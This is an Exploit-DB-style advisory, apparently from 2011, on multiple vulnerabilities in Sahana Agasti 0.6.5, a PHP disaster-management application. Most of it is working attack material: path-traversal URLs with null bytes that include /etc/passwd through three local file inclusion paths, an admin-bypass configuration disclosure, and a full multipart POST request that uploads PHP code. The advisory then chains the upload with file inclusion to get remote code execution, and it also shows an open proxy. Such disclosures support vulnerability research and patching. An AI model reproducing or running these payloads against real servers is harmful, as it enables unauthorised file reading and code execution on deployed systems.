sahana agasti 0.6.5 – Multiple Vulnerabilities

  • 作者: dun
    日期: 2011-01-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15942/
  • :::::::-. ...::::::.:::.
 ;;, `';, ;; ;;;`;;;;,`;;;
 `[[ [[[[' [[[[[[[[. '[[
$$,$$$$$$$$$$ "Y$c$$
888_,o8P'88.d888888Y88
MMMMP"` "YmmMMMM""MMM YM
 
 [ Discovered by dun \ posdub[at]gmail.com ]
 [ dun / 2011-01-07 ]
 #############################################################
 #[ Sahana Agasti <= 0.6.5 ]Multiple Vulnerabilities #
 #############################################################
 #
 # Script: "Agasti is the PHP based project of the Sahana Software Foundation. 
 #Based a long-term preparedness for disaster management..."
 #
 # Script site: http://www.sahanafoundation.org/
 # Download: https://launchpad.net/sahana-agasti/
 #

 [LFI] Vuln: ( Scenario 1)
 http://site.com/sahana-0.6.5/www/stream.php?stream_type=/../../../../../../../../../etc/passwd%00
 File: ./sahana-0.6.5/www/stream.php

20	$global['approot'] = realpath(dirname(__FILE__)).'/../';
21	// $global['approot'] = '/usr/local/bin/sahana/';
22	$global['previous']=false;
	...(CUT)...
39	if(!$global['previous']){
40	$global['action'] = (NULL == $_REQUEST['act']) ? 
41	"default" : $_REQUEST['act'];
42	$global['module'] = (NULL == $_REQUEST['mod']) ? 
43	"home" : $_REQUEST['mod'];
44	}
45	$global['stream_type'] = $_GET['stream_type'];// [1]
	...(CUT)...
52	shn_front_controller();
	...(CUT)...	
64	function shn_front_controller() 
65	{
66	global $global;
67	global $conf;
68	$approot = $global['approot'];
69	$action = $global['action'];
70	$module = $global['module'];	
	...(CUT)...		
90	if($global['stream_type'] && file_exists($approot.'/inc/lib_st_'.$global['stream_type'].'.inc') ){// [2]
91	require_once ($approot.'/inc/lib_st_'.$global['stream_type'].'.inc'); // [3] LFI
92	if(file_exists($approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc'))
93	$default_file = $approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc';
94	else
95	$default_file = 'stream.inc';
96	}	
	

 In this scenario script try to include something like this:
 /var/www/apache/sahana/www/..//inc/lib_st_/../../../../../../../../../etc/passwd\0.inc

 ################################################################################################################################

 [LFI] Vuln: ( Scenario 2)
 http://site.com/sahana-0.6.5/www/stream.php?mod=/../../../../../../../../../etc/passwd%00
 File: ./sahana-0.6.5/www/stream.php
42	$global['module'] = (NULL == $_REQUEST['mod']) ? 
43	"home" : $_REQUEST['mod'];
	...(CUT)...		
70	$module = $global['module'];	
 	...(CUT)...		
	90	if($global['stream_type'] && file_exists($approot.'/inc/lib_st_'.$global['stream_type'].'.inc') ){
91	require_once ($approot.'/inc/lib_st_'.$global['stream_type'].'.inc');
92	if(file_exists($approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc'))
93	$default_file = $approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc';
94	else
95	$default_file = 'stream.inc';
96	}else
97	$default_file = 'main.inc'; // [1]
98	
99	// include the correct module file based on action and module
 100	$module_file = $approot.'mod/'.$module.'/'.$default_file; // [2]
 101	if (! file_exists($module_file)) {//
 102	$module_file = $approot.'mod/home/'.$default_file;
 103	}
	...(CUT)...		
 109	//Include the module file
 110	include($module_file);// [3] LFI

 In this scenario script try to include something like this:
 /var/www/apache/sahana/www/../mod//../../../../../../../../../etc/passwd\0/main.inc

 ################################################################################################################################

 [LFI] Vuln: ( Scenario 3 without file_exists)
 http://site.com/sahana-0.6.5/www/stream.php?act=adm&mod=/../../../../../../../../../etc/passwd%00
 File: ./sahana-0.6.5/www/stream.php

42	$global['module'] = (NULL == $_REQUEST['mod']) ?// [1]
43	"home" : $_REQUEST['mod'];
	...(CUT)...		
84	if (preg_match('/^adm/',$action)) { //
85	$module = 'admin';// [2]
86	$action = 'modadmin'; //
87	}
	...(CUT)...		
96	}else
97	$default_file = 'main.inc'; // [3]
98	
99	// include the correct module file based on action and module
 100	$module_file = $approot.'mod/'.$module.'/'.$default_file;// [4] ( /var/www/apache/sahana/www/../mod/admin/main.inc )
	...(CUT)...	
 110	include($module_file);// [5]
	...(CUT)...	 
 125	$module_function = 'shn_'.$module.'_'.$action;// [6] 
 126	if (!function_exists($module_function)) { //
 127	$module_function='shn_'.$module.'_default';
 128	}
 129	$_SESSION['last_module']=$module;
 130	$_SESSION['last_action']=$action;
 131	$output = $module_function();// [7]( shn_admin_modadmin() ) 

 File: ./sahana-0.6.5/mod/admin/main.inc

 161	function shn_admin_modadmin()
 162	{
 163		global $global;
 164	
 165		// include original module admin section
 166		include $global['approot']."/mod/".$global['module']."/admin.inc";// [8] LFI

 In this scenario script try to include something like this:
 /var/www/apache/sahana/www/..//mod//../../../../../../../../../etc/passwd\0/admin.inc

 ################################################################################################################################

 [Configuration disclosure] Vuln:
 http://site.com/sahana-0.6.5/www/stream.php?mod=admin&act=conf_list
 File: ./sahana-0.6.5/www/stream.php

 100	$module_file = $approot.'mod/'.$module.'/'.$default_file;// [1] ( /var/www/apache/sahana/www/../mod/admin/main.inc )
	...(CUT)...	 
 110	include($module_file); // [2]
	...(CUT)...	
 125	$module_function = 'shn_'.$module.'_'.$action; // [3]
 126	if (!function_exists($module_function)) {
 127	$module_function='shn_'.$module.'_default';
 128	}
 129	$_SESSION['last_module']=$module;
 130	$_SESSION['last_action']=$action;
 131	$output = $module_function();// [4] ( shn_admin_conf_list())
 
 File: ./sahana-0.6.5/mod/admin/main.inc
31	include_once $global['approot']."mod/admin/conf_admin.inc";// [5]
	
 File: ./sahana-0.6.5/mod/admin/conf_admin.inc
22	function shn_admin_conf_list() // [6] Configuration disclosure
	...(CUT)...	 
 
 We can prepare function name, with using GET variables (mod, act)
 We can use prepared functions with "shn_" prefix, with bypassing admin privileges
 So lets see what next..

 ################################################################################################################################

 [Arbitrary File Upload] Vuln:
 http://site.com/sahana-0.6.5/www/stream.php?mod=admin&act=lc_file_browser
 File: ./sahana-0.6.5/www/stream.php

 131	$output = $module_function();// [1] ( shn_admin_lc_file_browser() 

 File: ./sahana-0.6.5/mod/admin/main.inc

 683	function shn_admin_lc_file_browser() // [2] Arbitrary File Upload
 684	{
 685		global $global;
 686		$locale = $_POST['locale'];
 687		//$file_type=$_POST['file_type'];
 688		$uploaddir = "../res/locale/$locale/LC_MESSAGES/";
 689		//"../res/locale/$locale/LC_MESSAGES/";
 690		//echo $uploaddir;
 691		$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
 692	
 693		if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
 694			add_confirmation('File uploaded sucessfully');
 695		}else {
 696			add_error('File uploaded failed');
 697		}
 698	
 699	}

 We can upload some file to /res/locale/$locale/LC_MESSAGES/ (default $locale is my_MM),
 with using prepared POST
 Example:

 POST /sahana-0.6.5/www/stream.php?mod=admin&act=lc_file_browser HTTP/1.1
 Host: site.com
 User-Agent: Mozilla/5.0 Gecko/20101203 Firefox/3.6.13
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: pl,en-us;q=0.7,en;q=0.3
 Accept-Encoding: gzip,deflate
 Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
 Keep-Alive: 115
 Connection: keep-alive
 Content-Type: multipart/form-data; boundary=---------------------------11682257938924
 Content-Length: 420
 -----------------------------11682257938924
 Content-Disposition: form-data; name="MAX_FILE_SIZE"

 50000
 -----------------------------11682257938924
 Content-Disposition: form-data; name="userfile"; filename="file.txt"
 Content-Type: text/plain 

 <?php phpinfo(); ?>
 -----------------------------11682257938924
 Content-Disposition: form-data; name="locale"
 
 my_MM
 -----------------------------11682257938924-- 

 File /res/locale/my_MM/LC_MESSAGES/file.txt is created
 We can use main.inc filename instead of file.txt
 So let's go back to LFI ( scenario 1,2 ):
 ( scenario 1 ) http://site.com/sahana-0.6.5/www/stream.php?stream_type=/../../res/locale/my_MM/LC_MESSAGES/main
 ( scenario 2 ) http://site.com/sahana-0.6.5/www/stream.php?mod=/..//res/locale/my_MM/LC_MESSAGES/ 
 It includes LC_MESSAGES/main.inc with our <?php phpinfo(); ?> (AFU+LFI=RCE)

 ################################################################################################################################

 [PHP Proxy]
 http://site.com/sahana-0.6.5/www/res/lib_proxy.php?url=http://site2.com/dupa.php
 File: ./sahana-0.6.5/www/res/lib_proxy.php

17$url = $_GET['url'];
18$parseurl = urldecode($url);
19
20// open cURL session
21$ch = curl_init();
22curl_setopt($ch, CURLOPT_POST,1);
23curl_setopt($ch, CURLOPT_URL,$parseurl);
24curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,2);
25curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
26curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
27
28$xml = curl_exec($ch);
29curl_close($ch);
30
31header("Content-Type: text/xml");
32
33echo $xml;

 ################################################################################################################################
 And possible other bugs...
 ################################################################################################################################